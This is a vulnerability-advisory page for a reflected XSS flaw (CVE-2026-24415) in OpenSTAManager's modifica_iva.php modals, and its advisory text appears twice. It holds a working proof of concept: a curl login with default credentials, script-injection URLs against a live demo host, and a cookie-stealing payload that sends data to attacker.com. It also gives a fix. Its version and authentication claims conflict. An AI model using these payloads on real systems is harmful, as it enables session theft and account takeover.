Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.1
OpenSTAManager: Hackers Can Steal User Sessions and Data
CVE-2026-24415
GHSA-jfgp-g7x7-j25j
Summary
OpenSTAManager has a security weakness that allows hackers to steal user sessions and sensitive data. If not fixed, an attacker can gain access to your account information and take actions on your behalf. Update OpenSTAManager to the latest version to patch this vulnerability.
What to do
- Update devcode-it openstamanager to version 2.9.8.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| devcode-it | openstamanager | <= 2.9.8 | 2.9.8 |
| devcode | openstamanager | <= 2.9.8 | – |
Original title
OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter
Original description
### Summary
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.
**Vulnerable Parameter:** `righe` (GET)
### Details
OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.
**Vulnerable Code Location:**
File: `/modules/contratti/modals/modifica_iva.php` (Line 125)
```php
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
```
The `$_GET['righe']` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.
**All Affected Files:**
1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**
2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**
3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**
4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**
5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**
6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**
### PoC
**Prerequisites:**
- Running instance of OpenSTAManager v2.9.8
- Valid admin credentials (username: admin, password: admin for test instance)
**Step 1: Login**
```bash
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
```
**Step 2: Trigger XSS**
Navigate to the following URL in a browser (or use curl with cookies):
```
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
```
**Tested URLs (All vulnerable):**
- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
**Expected Result:**
JavaScript alert popup displays showing the current session cookie, confirming code execution.
**HTML Output (verified on live instance):**
```html
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
```
**Verification:**
<img width="1260" height="99" alt="image" src="https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473" />
<img width="2060" height="1180" alt="image" src="https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0" />
**Alternative Payloads:**
Session stealing: `"><script>fetch('https://attacker.com/?c='+document.cookie)</script>`
### Impact
**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.
**Attack Scenario:**
1. Attacker crafts malicious URL with XSS payload
2. Attacker sends URL to victim via email/chat/phishing
3. Victim (authenticated user) clicks the link
4. Malicious JavaScript executes in victim's browser context
5. Attacker can:
- Steal session cookies → Full account takeover
- Perform actions on behalf of victim (create/modify/delete records)
- Steal CSRF tokens and bypass CSRF protection
- Redirect to phishing page
- Inject keylogger to capture sensitive data
- Modify page content to trick user into revealing credentials
**Recommended Fix:**
```php
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
```
Apply this fix to all affected files listed in Details section.
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.
**Vulnerable Parameter:** `righe` (GET)
### Details
OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.
**Vulnerable Code Location:**
File: `/modules/contratti/modals/modifica_iva.php` (Line 125)
```php
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
```
The `$_GET['righe']` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.
**All Affected Files:**
1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**
2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**
3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**
4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**
5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**
6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**
### PoC
**Prerequisites:**
- Running instance of OpenSTAManager v2.9.8
- Valid admin credentials (username: admin, password: admin for test instance)
**Step 1: Login**
```bash
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
```
**Step 2: Trigger XSS**
Navigate to the following URL in a browser (or use curl with cookies):
```
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
```
**Tested URLs (All vulnerable):**
- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>`
**Expected Result:**
JavaScript alert popup displays showing the current session cookie, confirming code execution.
**HTML Output (verified on live instance):**
```html
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
```
**Verification:**
<img width="1260" height="99" alt="image" src="https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473" />
<img width="2060" height="1180" alt="image" src="https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0" />
**Alternative Payloads:**
Session stealing: `"><script>fetch('https://attacker.com/?c='+document.cookie)</script>`
### Impact
**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.
**Attack Scenario:**
1. Attacker crafts malicious URL with XSS payload
2. Attacker sends URL to victim via email/chat/phishing
3. Victim (authenticated user) clicks the link
4. Malicious JavaScript executes in victim's browser context
5. Attacker can:
- Steal session cookies → Full account takeover
- Perform actions on behalf of victim (create/modify/delete records)
- Steal CSRF tokens and bypass CSRF protection
- Redirect to phishing page
- Inject keylogger to capture sensitive data
- Modify page content to trick user into revealing credentials
**Recommended Fix:**
```php
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
```
Apply this fix to all affected files listed in Details section.
nvd CVSS3.1
6.1
nvd CVSS4.0
5.1
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 3 Mar 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026